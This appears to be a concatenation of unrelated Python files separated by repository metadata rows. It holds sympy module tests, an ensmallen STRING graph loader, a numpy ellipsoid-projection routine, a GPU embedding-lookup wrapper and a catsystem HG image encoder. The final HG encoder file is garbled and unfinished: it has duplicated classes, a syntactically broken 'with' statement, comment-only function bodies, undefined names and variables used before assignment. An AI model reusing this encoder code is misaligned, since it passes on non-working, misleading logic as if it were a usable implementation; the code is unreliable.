def test_intersection():
# SCA, example 2.8.5
F = QQ[x, y].free_module(2)
M1 = F.submodule([x, y], [y, 1])
M2 = F.submodule([0, y - 1], [x, 1], [y, x])
I = F.submodule([x, y], [y**2 - y, y - 1], [x*y + y, x + 1])
I1, rel1, rel2 = M1.intersect(M2, relations=True)
assert I1 == M2.intersect(M1) == I
for i, g in enumerate(I1.gens):
assert g == sum(c*x for c, x in zip(rel1[i], M1.gens)) \
== sum(d*y for d, y in zip(rel2[i], M2.gens))
assert F.submodule([x, y]).intersect(F.submodule([y, x])).is_zero()
def test_quotient():
# SCA, example 2.8.6
R = QQ[x, y, z]
F = R.free_module(2)
assert F.submodule([x*y, x*z], [y*z, x*y]).module_quotient(
F.submodule([y,z], [z,y])) == QQ[x, y, z].ideal(x**2*y**2 - x*y*z**2)
assert F.submodule([x, y]).module_quotient(F.submodule()).is_whole_ring()
M = F.submodule([x**2, x**2], [y**2, y**2])
N = F.submodule([x + y, x + y])
q, rel = M.module_quotient(N, relations=True)
assert q == R.ideal(y**2, x - y)
for i, g in enumerate(q.gens):
assert g*N.gens[0] == sum(c*x for c, x in zip(rel[i], M.gens))
def test_groebner_extendend():
M = QQ[x,y,z].free_module(3).submodule([x + 1, y, 1], [x*y, z, z**2])
G, R = M._groebner_vec(extended=True)
for i, g in enumerate(G):
assert g == sum(c*gen for c, gen in zip(R[i], M.gens))
| 33.735065
| 87
| 0.524638
|
4a0a2cfafed92c013911ba72b75b9b38b1ff878e
| 3,588
|
py
|
Python
|
bindings/python/ensmallen/datasets/string/candidatusmycoplasmahaemolamaestrpurdue.py
|
AnacletoLAB/ensmallen_graph
|
b2c1b18fb1e5801712852bcc239f239e03076f09
|
[
"MIT"
] | 5
|
2021-02-17T00:44:45.000Z
|
2021-08-09T16:41:47.000Z
|
bindings/python/ensmallen/datasets/string/candidatusmycoplasmahaemolamaestrpurdue.py
|
AnacletoLAB/ensmallen_graph
|
b2c1b18fb1e5801712852bcc239f239e03076f09
|
[
"MIT"
] | 18
|
2021-01-07T16:47:39.000Z
|
2021-08-12T21:51:32.000Z
|
bindings/python/ensmallen/datasets/string/candidatusmycoplasmahaemolamaestrpurdue.py
|
AnacletoLAB/ensmallen
|
b2c1b18fb1e5801712852bcc239f239e03076f09
|
[
"MIT"
] | 3
|
2021-01-14T02:20:59.000Z
|
2021-08-04T19:09:52.000Z
|
"""
This file offers the methods to automatically retrieve the graph Candidatus Mycoplasma haemolamae str. Purdue.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def CandidatusMycoplasmaHaemolamaeStrPurdue(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Candidatus Mycoplasma haemolamae str. Purdue graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
Wether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
Wether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instace of Candidatus Mycoplasma haemolamae str. Purdue graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="CandidatusMycoplasmaHaemolamaeStrPurdue",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
| 34.171429
| 223
| 0.684783
|
4a0a2d0e65bb321ca557a7f9a4d2f11161733931
| 5,347
|
py
|
Python
|
utils/ell_proj_np.py
|
StanfordASL/UP
|
1677960690cc1a7576d62639333decb31b730707
|
[
"MIT"
] | 6
|
2021-01-08T05:44:52.000Z
|
2021-12-12T06:39:14.000Z
|
utils/ell_proj_np.py
|
StanfordASL/UP
|
1677960690cc1a7576d62639333decb31b730707
|
[
"MIT"
] | null | null | null |
utils/ell_proj_np.py
|
StanfordASL/UP
|
1677960690cc1a7576d62639333decb31b730707
|
[
"MIT"
] | 1
|
2021-03-19T15:47:23.000Z
|
2021-03-19T15:47:23.000Z
|
##
## Code written by Robert Dyro, Stanford ASL, 2020
##
## Reproduces the Self-adaptive Alternating Direction Method of Multipliers (S-ADMM) as described in
## Z. Jia, X. Cai, and D. Han. Comparison of several fast algorithms for projection onto anellipsoid.
## Journal of Computational and Applied Mathematics, 319(1):320–337, 2017.
##^# utils and imports #########################################################
import time
# ------------
import numpy as np, scipy.linalg as LA, math
_bmv = lambda A, x: (A @ x[..., None])[..., 0]
##$#############################################################################
##^# numpy implementation ######################################################
def _fsolve_fn(A, x, lower=True):
assert A.ndim == 3
return np.stack([LA.cho_solve((A[i], lower), x[i]) for i in
range(A.shape[0])])
def _proj_l2(F, A, AT, z, v, rho):
return _fsolve_fn(F, z + rho[..., None] * _bmv(AT, v))
def _proj_uball(v):
return v / np.maximum(np.linalg.norm(v, axis=-1), 1.0)[..., None]
def proj_ell(Q, z, rho=None, max_it=10**2, eps=None, x_guess=None,
verbose=False):
"""
Projects points z such that they lie within the ellipsoid, i.e.,
z.T @ Q @ z <= 1
Inputs: Q : ellipsoidal shape matrices - (B, n_z, n_z)
z : points to project - (B, n_z)
Outputs: new_z : projected points - (B, n_z)
"""
bshape = Q.shape[:-2]
Q, z = Q.reshape((-1,) + Q.shape[-2:]), z.reshape((-1, z.shape[-1]))
if rho is None:
rho = Q.shape[-1] / np.sqrt(np.linalg.norm(Q, axis=(-2, -1)))
else:
rho = rho * np.ones(Q.shape[0])
eps = eps if eps is not None else 1e-7
A = np.stack([LA.cholesky(Q[i], lower=False) for i in range(Q.shape[0])])
AT = A.swapaxes(-2, -1)
P = np.eye(Q.shape[-1]) + rho[..., None, None] * Q
F = np.stack([LA.cholesky(P[i], lower=True) for i in range(P.shape[0])])
x = x_guess if x_guess is not None else z
y = _fsolve_fn(A, x, lower=False)
u = np.zeros(z.shape)
x_prev, it = x, 0
r_prim, r_dual = np.array(float("inf")), np.array(float("inf"))
while it < max_it and (r_prim.mean() > eps or r_dual.mean() > eps):
x = _proj_l2(F, A, AT, z, y - u, rho=rho)
Ax = _bmv(A, x)
y = _proj_uball(Ax + u)
u = u + (Ax - y)
r_prim = np.linalg.norm(Ax - y, axis=-1) / math.sqrt(A.shape[-1])
r_dual = np.linalg.norm(x - x_prev, axis=-1) / math.sqrt(A.shape[-1])
x_prev, it = x, it + 1
# print(it)
if verbose:
data = dict(it=it, r_prim=r_prim, r_dual=r_dual)
data["norms"] = np.sum(x * _bmv(Q, x), -1)
if it == max_it and (r_prim.mean() > eps or r_dual.mean() > eps):
print("Ellipsoid projection did not converge")
# print("The solution norms in the ellipse norm are:")
# print(data["norms"])
return x.reshape(bshape + (x.shape[-1],)), data
else:
return x.reshape(bshape + (x.shape[-1],))
##$#############################################################################
##^# testing routines ##########################################################
def check(Q, z):
import cvxpy as cp
assert z.ndim == 1
x_var = cp.Variable(z.shape)
obj, cstr = cp.sum_squares(x_var - z), [cp.quad_form(x_var, Q) <= 1.0]
prob = cp.Problem(cp.Minimize(obj), cstr)
prob.solve(cp.ECOS, verbose=False)
assert prob.status == "optimal"
return x_var.value.reshape(-1)
def sample():
n = 10**1
N = 10
A = np.random.randn(*(N, N, n, n))
A[:N//2, :, :] *= 1e-3
A[N//2:, :, :] *= 1e6
Q = A @ A.swapaxes(-2, -1) / 2 + np.eye(A.shape[-1]) * 1e-1
z = np.random.randn(*(N, N, n)) * 1e9
return Q, z
def sample_2():
n = 32
N = 100
A = np.random.randn(*(N, n, n))
A[:N//2, :, :] *= 1e-3
# A[N//2:, :, :] *= 1e6
Q = A @ A.swapaxes(-2, -1) / 2 + np.eye(A.shape[-1]) * 1e-1
z = np.random.randn(*(N, n)) *0.1#* 1e9
return Q, z
def main(Q, z):
#A = np.random.randn(*(3, 3))
#Q = A @ A.T / 2
#z = np.random.randn(3) * 10
#x1 = check(Q, z)
#print(x1)
#print("norm =", np.sum(x1 * _bmv(Q, x1)))
#x2 = proj_ell(Q, z, rho=1e0)
#print(x2)
# Naive method
x_naive = (z.T/np.sum(z * _bmv(Q, z), -1)).T
print("proj_dists naive =", np.linalg.norm(x_naive-z))
#import matplotlib.pyplot as plt
#rho_exps = range(-6, 4)
#its = [proj_ell(Q, z, verbose=True, rho=10**float(rho_exp))[1]["it"]
# for rho_exp in rho_exps]
#plt.figure()
#plt.plot(rho_exps, its)
#plt.show()
max_it = 200
print('Norms before = ', np.sum(z * _bmv(Q, z), -1))
print('Q=',Q.shape)
print('z=',z.shape)
x2, data = proj_ell(Q, z, verbose=True, eps=1e-5, max_it=max_it)
print("norm =", data["norms"])
print("it =", data["it"])
# print("r_prim =", data["r_prim"])
# print("r_dual =", data["r_dual"])
print(x2.shape)
print("proj_dists=", np.linalg.norm(x2-z))
# Q, z = sample()
Q, z = sample_2()
if __name__ == "__main__":
# main(Q, z)
start = time.time()
main(Q, z)
end = time.time()
print("\n\nelapsed time = ",end-start,"\n\n")
##$#############################################################################
| 34.496774
| 106
| 0.501403
|
4a0a2d4420d2cbbcba0049caf1aaacb8c886f95b
| 870
|
py
|
Python
|
python/athena/gpu_links/EmbeddingLookUpLink.py
|
DMALab/TSplit
|
8f86f987163aa06521bfeeb174616eb4a0a81b47
|
[
"Apache-2.0"
] | 2
|
2021-05-29T11:18:14.000Z
|
2021-09-09T14:29:21.000Z
|
python/athena/gpu_links/EmbeddingLookUpLink.py
|
DMALab/TSplit
|
8f86f987163aa06521bfeeb174616eb4a0a81b47
|
[
"Apache-2.0"
] | null | null | null |
python/athena/gpu_links/EmbeddingLookUpLink.py
|
DMALab/TSplit
|
8f86f987163aa06521bfeeb174616eb4a0a81b47
|
[
"Apache-2.0"
] | 1
|
2021-05-01T16:34:37.000Z
|
2021-05-01T16:34:37.000Z
|
from __future__ import absolute_import
import ctypes
from .._base import _LIB
from .. import ndarray as _nd
def embedding_lookup(in_mat, ids, out_mat, stream = None, profiler = None):
assert isinstance(in_mat, _nd.NDArray)
assert isinstance(ids, _nd.NDArray)
assert isinstance(out_mat, _nd.NDArray)
_LIB.DLGpuEmbeddingLookUp(
in_mat.handle, ids.handle, out_mat.handle, stream.handle if stream else None, ctypes.byref(profiler) if profiler else None)
def embedding_lookup_gradient(grad_out, ids, grad_in, stream = None, profiler = None):
assert isinstance(grad_out, _nd.NDArray)
assert isinstance(ids, _nd.NDArray)
assert isinstance(grad_in, _nd.NDArray)
_LIB.DLGpuEmbeddingLookUp_Gradient(
grad_out.handle, ids.handle, grad_in.handle, stream.handle if stream else None, ctypes.byref(profiler) if profiler else None)
| 41.428571
| 134
| 0.758621
|
4a0a2dddfb1969c976a03f1d256ecc78ae8af792
| 54,966
|
py
|
Python
|
src/catsys/imgs/hgencoder.py
|
AtomCrafty/catsystem-py
|
11bd96708e3959be84e41e30397820ebaa54974d
|
[
"MIT"
] | 6
|
2020-10-20T13:26:56.000Z
|
2022-02-15T05:26:38.000Z
|
src/catsys/imgs/hgencoder.py
|
AtomCrafty/catsystem-py
|
11bd96708e3959be84e41e30397820ebaa54974d
|
[
"MIT"
] | 2
|
2020-10-20T16:15:35.000Z
|
2021-07-08T18:15:23.000Z
|
src/catsys/imgs/hgencoder.py
|
AtomCrafty/catsystem-py
|
11bd96708e3959be84e41e30397820ebaa54974d
|
[
"MIT"
] | 1
|
2020-10-19T15:20:50.000Z
|
2020-10-19T15:20:50.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""HG image encoding utility
Provides the encoding and decoding methods for HG image encodings (HG-2, HG-3).
"""
__version__ = '1.0.0'
__date__ = '2020-09-19'
__author__ = 'Robert Jordan'
__all__ = []
#######################################################################################
import io, os, struct, zlib
import enum, collections # for type declarations only
from typing import Iterable, Iterator, List, Optional, NoReturn, Tuple, Type, Union # for hinting in declarations
# local imports
from ._baseimg import ImageContainer, ImageFrame
## PREDECLARE TYPES ##
HgSlice = collections.namedtuple('HgSlice', ('index', 'length')) #, 'data', 'cmd'))
HgData = collections.namedtuple('HgData', ('data', 'cmd'))
Point = collections.namedtuple('Point', ('x, y'))
Size = collections.namedtuple('Size', ('width', 'height'))
Rect = collections.namedtuple('Rect', ('x', 'y', 'width', 'height'))
#FORMAT: in byte-order (little endian)
#24bit = BGR
#32bit = BGRA
Color = collections.namedtuple('Color', ('r', 'g', 'b', 'a'))
def get_color(color:Union[int, Tuple[int,int,int], Tuple[int,int,int,int]]) -> Color:
if not isinstance(color, int):
if len(color) == 3:
return Color(*color[0], 0xff)
return Color(*color)
return Color((color >> 16) & 0xff, (color >> 8) & 0xff, color & 0xff, (color >> 24) & 0xff)
class HgAttribute(object):
__slots__ = ('x', 'y', 'width', 'height', 'rawcolor')
#
def __init__(self, x:int, y:int, width:int, height:int, color:Union[int, Color]):
self.x = x
self.y = y
self.width = width
self.height = height
if not isinstance(color, int):
if len(color) == 3:
color = Color(*color[0], 0xff)
else:
color = Color(*color)
else:
color = Color((color >> 16) & 0xff, (color >> 8) & 0xff, color & 0xff, (color >> 24) & 0xff)
self.color = color
#
@property
def point(self) -> Point: return Point(self.x, self.y)
@point.setter
def point(self, point:Size): self.x, self.y = point
#
#
@property
def size(self) -> Size: return Size(self.width, self.height)
@size.setter
def size(self, size:Size): self.width, self.height = size
#
@property
def rawcolor(self) -> int:
return ((self.color[0] << 16) | (self.color[1] << 8) |
(self.color[2] ) | (self.color[3] << 24))
@rawcolor.setter
def rawcolor(self, rawcolor):
self.color = Color(
(rawcolor >> 16) & 0xff, (rawcolor >> 8) & 0xff,
(rawcolor ) & 0xff, (rawcolor >> 24) & 0xff)
class StandardInfo(object):
__slots__ = ('width', 'height', 'bpp', 'offsetx', 'offsety', 'fullwidth', 'fullheight', 'transparent', 'originx', 'originy')
#
def __init__(self, width:int=0, height:int=0, bpp:int=0, offsetx:int=0, offsety:int=0, fullwidth:int=0, fullheight:int=0, transparent:bool=False, originx:int=0, originy:int=0):
self.width = 0
self.height = 0
self.bpp = 0 # pixel bit depth (bits per pixel)
self.bpc = 0 # channel bit depth (bits per channel) 0 => 8
self.canvasx = 0
self.canvasy = 0
self.canvaswidth = 0
self.canvasheight = 0
self.transparent = False
self.originx = 0
self.originy = 0
@property
def size(self) -> Size: return Size(self.width, self.height)
@size.setter
def size(self, size:Size): self.width, self.height = size
#
@property
def canvas(self) -> Rect: return Rect(self.canvasx, self.canvasy, self.canvaswidth, self.canvasheight)
@canvas.setter
def canvas(self, canvasrect:Rect): self.canvasx, self.canvasy, self.canvaswidth, self.canvasheight = canvasrect
#
@property
def canvassize(self) -> Size: return Size(self.canvaswidth, self.canvasheight)
@canvassize.setter
def canvassize(self, canvassize:Size): self.canvaswidth, self.canvasheight = canvassize
#
@property
def canvaspos(self) -> Point: return Point(self.canvasx, self.canvasy)
@canvaspos.setter
def canvaspos(self, canvaspos:Point): self.canvasx, self.canvasy = canvaspos
#
@property
def origin(self) -> Point: return Point(self.originx, self.originy)
@origin.setter
def origin(self, origin:Point): self.originx, self.originy = origin
#
@property
def bytedepth(self) -> int: return (self.bpp + 7) // 8
# @bytedepth.setter
# def bytedepth(self, bytedepth:int): self.bpp = bytedepth * 8
@property
def stride(self) -> int: return (self.width * self.bpp + 7) // 8
@property
def buffersize(self) -> int: return (self.stride * self.height)
@property
def hasalpha(self) -> bool: return self.bpp == 32
#
@property
def depthmax(self) -> int:
return (((1 << self.depth ** 2) - 1) & 0xff) if self.depth else 0xff
class StandardInfo(object):
"""StandardInfo(**kwargs) -> stdinfo with assigned kwargs
"""
__slots__ = ('size', 'bpp', 'depth', 'canvassize', 'canvaspos', 'transparent', 'origin')
def __init__(self, **kwargs):
self.size = Size(0, 0)
self.canvassize = Size(0, 0)
self.canvaspos = Point(0, 0)
self.origin = Point(0, 0)
self.transpareny = False
self.bpp = 0 # 24 or 32 required
self.bpc = 0 # only used in HG-2, (see source of info)
#<https://github.com/morkt/GARbro/blob/c5e13f6db1d24a62eb621c38c6fc31387338d857/ArcFormats/CatSystem/ImageHG2.cs#L117-L126>
for key,val in kwargs.items():
setattr(self, key, val)
#
#ATTRIBUTE PROPERTIES:
#
@property
def width(self) -> int: return self.size[0]
@width.setter
def width(self, width): self.size = Size(width, self.size[1])
@property
def height(self) -> int: return self.size[1]
@height.setter
def height(self, height): self.size = Size(self.size[0], height)
#
@property
def canvaswidth(self) -> int: return self.canvassize[0]
@canvaswidth.setter
def canvaswidth(self, canvaswidth): self.canvassize = Size(canvaswidth, self.canvassize[1])
@property
def canvasheight(self) -> int: return self.canvassize[1]
@canvasheight.setter
def canvasheight(self, canvasheight): self.canvassize = Size(self.canvassize[0], canvasheight)
#
@property
def canvasx(self) -> int: return self.canvaspos[0]
@canvasx.setter
def canvasx(self, canvasx): self.canvaspos = Point(canvasx, self.canvaspos[1])
@property
def canvasy(self) -> int: return self.canvaspos[1]
@canvasy.setter
def canvasy(self, canvasy): self.canvaspos = Point(self.canvaspos[0], canvasy)
#
@property
def originx(self) -> int: return self.origin[0]
@originx.setter
def originx(self, originx): self.origin = Point(originx, self.origin[1])
@property
def originy(self) -> int: return self.origin[1]
@originy.setter
def originy(self, originy): self.origin = Point(self.origin[0], originy)
#
#CALCULATED PROPERTIES:
#
@property
def bytedepth(self) -> int: return (self.bpp + 7) // 8
@bytedepth.setter
def bytedepth(self, bytedepth): self.bpp = bytedepth * 8
#
#
#ALIAS PROPERTIES
#
@property
def bitdepth(self) -> int: return self.bpp
@bitdepth.setter
def bitdepth(self, bitdepth): self.bpp = bitdepth
#
@property
def channeldepth(self) -> int: return self.bpc
@channeldepth.setter
def channeldepth(self, channeldepth): self.bpc = channeldepth
@property
def channelmax(self) -> int:
return ((2**self.bpc - 1) & 0xff) if self.bpc else 0xff # bitmask for number of bits
# @bytedepth.setter
# def bytedepth(self, bytedepth:int):
# self.bpp = bytedepth * 8
#
@property
def stride(self) -> int: return (self.width * self.bpp + 7) // 8
#
@property
def buffersize(self) -> int: return (self.stride * self.height)
#
@property
def offsetstride(self) -> int: return (self.canvasx * self.bpp + 7) // 8
#
@property
def canvasstride(self) -> int: return (self.canvaswidth * self.bpp + 7) // 8
@property
def canvasbuffersize(self) -> int: return (self.canvasstride * self.canvasheight)
#
@property
def hasalpha(self) -> bool: return self.bpp == 32
# [Flags]
# public enum HgxOptions {
# None = 0,
# Flip = (1 << 0), // Flip vertically (applied after crop when encoding)
# Crop = (1 << 2), // Expand or Shrink
# }
class HgOptions(enum.IntFlag):
"""FLIP: vertically flip the image
CROP: expand or shrink the image around transparent area
"""
#NONE = 0 # no options
FLIP = (1 << 0) # vertical flip
CROP = (1 << 1) # shrink/expand canvas size around transparency
_CHANGE_ALPHA = (1 << 2)
ADD_ALPHA = _CHANGE_ALPHA | 0
REMOVE_ALPHA = _CHANGE_ALPHA | (1 << 3)
class HgEncoding(object):
"""HgEncoding() -> HG image encoder/decoder
"""
_weighttables:Tuple[List[int], List[int], List[int], List[int]] = make_weight_tables()
_abstables:Tuple[List[int], List[int]] = make_abs_tables()
def __init__(self):
self.pixels = bytearray()
self.options = HgOptions(0)
self.size = Size(0, 0)
self.bpp = 0
self.depth = 0
self.canvassize = Size(0, 0)
self.canvaspos = Point(0, 0)
self.transparent = False
self.origin = Point(0, 0)
def unpack_slicemem(self, data:bytes, cmd:bytes):
block0 = block1 = block2 = block3 = buffer = None
try:
data = memoryview(zlib.decompress(data))
cmd = memoryview(zlib.decompress(cmd))
bifbuf = BitBuffer(cmd, len(cmd))
copyflag = bitbuf.read_flag() # is first run non-zero data?
buflen = bitbuf.read_eliasgamma() # length of output buffer (usually height x stride)
buffer = memoryview(bytearray(buflen))
data = data.release()
cmd = cmd.release()
except:
# if isinstance(data, memoryview):
# data.release()
# if isinstance(cmd, memoryview):
# cmd.release()
if isinstance(buffer, memoryview):
buffer.release()
raise
buffer = unpack_datamem(data, cmd)
finally:
if isinstance(data, memoryview):
data.release()
if isinstance(cmd, memoryview):
cmd.release()
if isinstance(buffer, memoryview):
buffer.release()
with memoryview(data) as data:
with memoryview(cmd) as cmd:
buffer = unpack_datamem(data, cmd)
bifbuf = BitBuffer(cmd, len(cmd))
copyflag = bitbuf.read_flag() # is first run non-zero data?
buflen = bitbuf.read_eliasgamma() # length of output buffer (usually height x stride)
_buffer = bytearray(buflen) # already filled with zero-bytes
buffer = unpack_datamem(data, cmd)
memoryblocks = [None] * 4
with memoryview
def unpack_zrle_pt1(self, data:memoryview, cmd:memoryview) -> Tuple[BitBuffer, copyflag, bytearray]:
# with memoryview(zlib.decompress(data)) as data:
# with memoryview(zlib.decompress(cmd)) as cmd:
# return unpack_datamem2(data, cmd)
# def unpack_datamem(self, data:memoryview, cmd:memoryview) -> bytearray:
# data = zlib.decompress(data)
# cmd = zlib.decompress(cmd)
# with memoryview(zlib.decompress(data)) as data:
# with memoryview(zlib.decompress(cmd)) as cmd:
# return unpack_datamem2(data, cmd)
def make_fwd_weight_tables() -> List[Tuple[int], Tuple[int], Tuple[int], Tuple[int]]:
pass
def rgba_image(image:PIL.Image, needalpha:bool=False):
bands = image.getbands()
hasalpha = 'A' in bands or 'a' in bands
if image.mode != 'RGBA' and (needalpha or hasalpha):
image = image.convert('RGBA')
elif image.mode != 'RGB' and (not needalpha and not hasalpha):
image = image.convert('RGB')
return image
def rgba_bytes(image:PIL.Image, needalpha:bool=False, orientation:int=1) -> Tuple[PIL.Image, str]:
image = rgba_image(image, needalpha)
if image.mode == 'RGBA':
bpp = 32
mode = 'BGRA'
elif image.mode == 'RGBA':
bpp = 24
mode = 'BGR'
stride = ((image.width * bpp + 7) // 8 + 3) & ~0x3
return (image.tobytes('raw', 'BGRA', stride, orientation), image.mode)
if image.mode == 'RGBA':
bpp = 32
mode = 'BGRA'
elif image.mode == 'RGBA':
bpp = 24
mode = 'BGR'
stride = ((image.width * bpp + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'BGRA', stride, orientation)
if image.mode != 'RGBA' and (image.mode.endswith('A') or image.mode.endswith('a')):
image = image.convert('RGBA')
elif image.mode == 'RGBA':
bitdepth = 32
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'BGRA', stride, orientation)
elif image.mode == 'RGB':
bitdepth = 24
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'BGR', stride, orientation)
elif image.mode == 'L':
bitdepth = 8
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'L', stride, orientation)
elif image.mode == '1':
bitdepth = 1
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', '1', stride, orientation)
else:
#TODO: Auto-convert? or fail?
#image = image.convert('RGBA')
#bitdepth = 32
#stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
#pixels = image.tobytes('raw', 'BGRA', stride, orientation)
raise ValueError('Unsupported image mode {0!r} for writing'.format(image.mode))
def run_tests():
import PIL
import PIL.Image
import PIL.ImageOps
needalpha = False
orientation = 1
imgpath = r"path\to\testimage.png"
with PIL.Image.open(imgpath) as imgfile:
image = rgba_image(imgfile, needalpha)
hasalpha = image.mode == 'RGBA'
mode = image.mode
with memoryview(rgba_bytes(image, needalpha, orientation)):
image.tobytes('raw', 'BGRA', stride, orientation)
image = image.crop(bbox)
if image.mode != 'RGBA' and (image.mode.endswith('A') or image.mode.endswith('a')):
image = image.convert('RGBA')
elif image.mode == 'RGBA':
bitdepth = 32
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'BGRA', stride, orientation)
elif image.mode == 'RGB':
bitdepth = 24
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'BGR', stride, orientation)
elif image.mode == 'L':
bitdepth = 8
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'L', stride, orientation)
elif image.mode == '1':
bitdepth = 1
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', '1', stride, orientation)
else:
#TODO: Auto-convert? or fail?
#image = image.convert('RGBA')
#bitdepth = 32
#stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
#pixels = image.tobytes('raw', 'BGRA', stride, orientation)
raise ValueError('Unsupported image mode {0!r} for writing'.format(image.mode))
def pack_from_pixels(pixels:bytearray, sliceidx:int, slicelen:int, width:int, height:int, bpp:int, bpc:int, offsetx:int, offsety:int, fullwidth:int, fullheight:int, flip:bool):
bytedepth = bpp // 8 # only bpp 24,32 not supported by CS2
stride = (width * pixlen + 3) & ~0x3
fullstride = (fullwidth * bytedepth + 3) & ~0x3
colstart = offsetx
colend = offsetx + width
rowstart = offsety + sliceidx
rowend = offsety + sliceidx + slicelen
fullstart = rowstart * fullstride + colstart * bytedepth
fullend = rowend * fullstride + colend * bytedepth
del colstart, colend, rowstart, rowend
if not flip:
normyrange = range(fullstart, fullend, fullstride)
deltayrange = range(fullstart + stride, fullend, fullstride)
deltaxrange = range(fullstart + bytedepth, fullstart + stride, 1)
else:
normyrange = range(fullend - stride, fullstart - 1, fullstride)
deltayrange = range(fullend - stride - stride, fullstart - 1, -fullstride)
deltaxrange = range(fullend - stride + bytedepth, fullend, 1)
# buflen = len(buffer)
# sectlen = buflen // 4
sectlen = len(buffer) // 4
# sect0, sect1, sect2, sect3 = sects = range(0, sectlen * 4, sectlen)
abstable = make_abs_tables()[0] # fwd abstable
#table0, table1, table2, table3 = make_weight_tables()
#block0, block1, block2, block3 = blocks = [None] * 4
block0 = block1 = block2 = block3 = None
abstable = bytes(make_abs_tables()[0]) # fwd abstable
stride = ((width * bpp + 7) // 8 + 3) & ~0x3
bufstart = hgslice.index * stride
bufend = (hgslice.index + hgslice.length) * stride
sectlen = slicelen * stride // 4
blocks = bytearray(sectlen * 4)
block0 = block1 = block2 = block3 = None
try:
buffer = memoryview(buffer)
abstable = memoryview(abstable)
# for i, sect in enumerate(range(0, sectlen * 4, sectlen)):
# blocks[i] = buffer[sect:sect + sectlent]
# block0, block1, block2, block3 = blocks
block0 = buffer[sect0:sect0 + sectlen]
block1 = buffer[sect1:sect1 + sectlen]
block2 = buffer[sect2:sect2 + sectlen]
block3 = buffer[sect3:sect3 + sectlen]
buffer = buffer.release()
# normalize pixel buffer into data blocks
i = 0
for y0 in normyrange:
for yx in range(y0, y0 + stride, 4):
# val = unpack_from('<I', pixels, src)
# b = abstable[pixels[xy ]]
# v3 = ((b ) & 0x3)
# v2 = ((b >> 2) & 0x3)
# v1 = ((b >> 4) & 0x3)
# v0 = ((b >> 6) & 0x3)
# b = abstable[pixels[xy + 1]]
# v3 |= ((b << 2) & 0xc)
# v2 |= ((b ) & 0xc)
# v1 |= ((b >> 2) & 0xc)
# v0 |= ((b >> 4) & 0xc)
# b = abstable[pixels[xy + 2]]
# v3 |= ((b << 4) & 0x30)
# v2 |= ((b << 2) & 0x30)
# v1 |= ((b ) & 0x30)
# v0 |= ((b >> 2) & 0x30)
# b = abstable[pixels[xy + 3]]
# v3 |= ((b << 6) & 0xc0)
# v2 |= ((b << 4) & 0xc0)
# v1 |= ((b << 2) & 0xc0)
# v0 |= ((b ) & 0xc0)
# v0 = v1 = v2 = v3 = 0
#m = 0x3
for j in range(0, 8, 2):
#for j in range(0, 8, 2): # section mask to byte
#m = 0x3 << j
b = abstable[pixels[xy]]
xy += 1
v3 |= ((b ) & 0x3) << j
v2 |= ((b >> 2) & 0x3) << j
v1 |= ((b >> 4) & 0x3) << j
v0 |= ((b >> 6) & 0x3) << j
#m <<= 2
# b = ((((pixels[src ] >> k) & 0x3)) |
# (((pixels[src + 1] >> k) & 0x3) << 2) |
# (((pixels[src + 2] >> k) & 0x3) << 4) |
# (((pixels[src + 3] >> k) & 0x3) << 6))
# idx |= (((pixels[src] >> k) & 0x3) << j)
# src += 1
block3[i] = v3
block2[i] = v2
block1[i] = v1
block0[i] = v0
#blocks[i] = idx & 0xff
i += 1
# val = (table0[block0[i]] | table1[block1[i]] |
# table2[block2[i]] | table3[block3[i]]))
# pixels[yx ] = invtable[(val ) & 0xff]
# pixels[yx + 1] = invtable[(val >> 8) & 0xff]
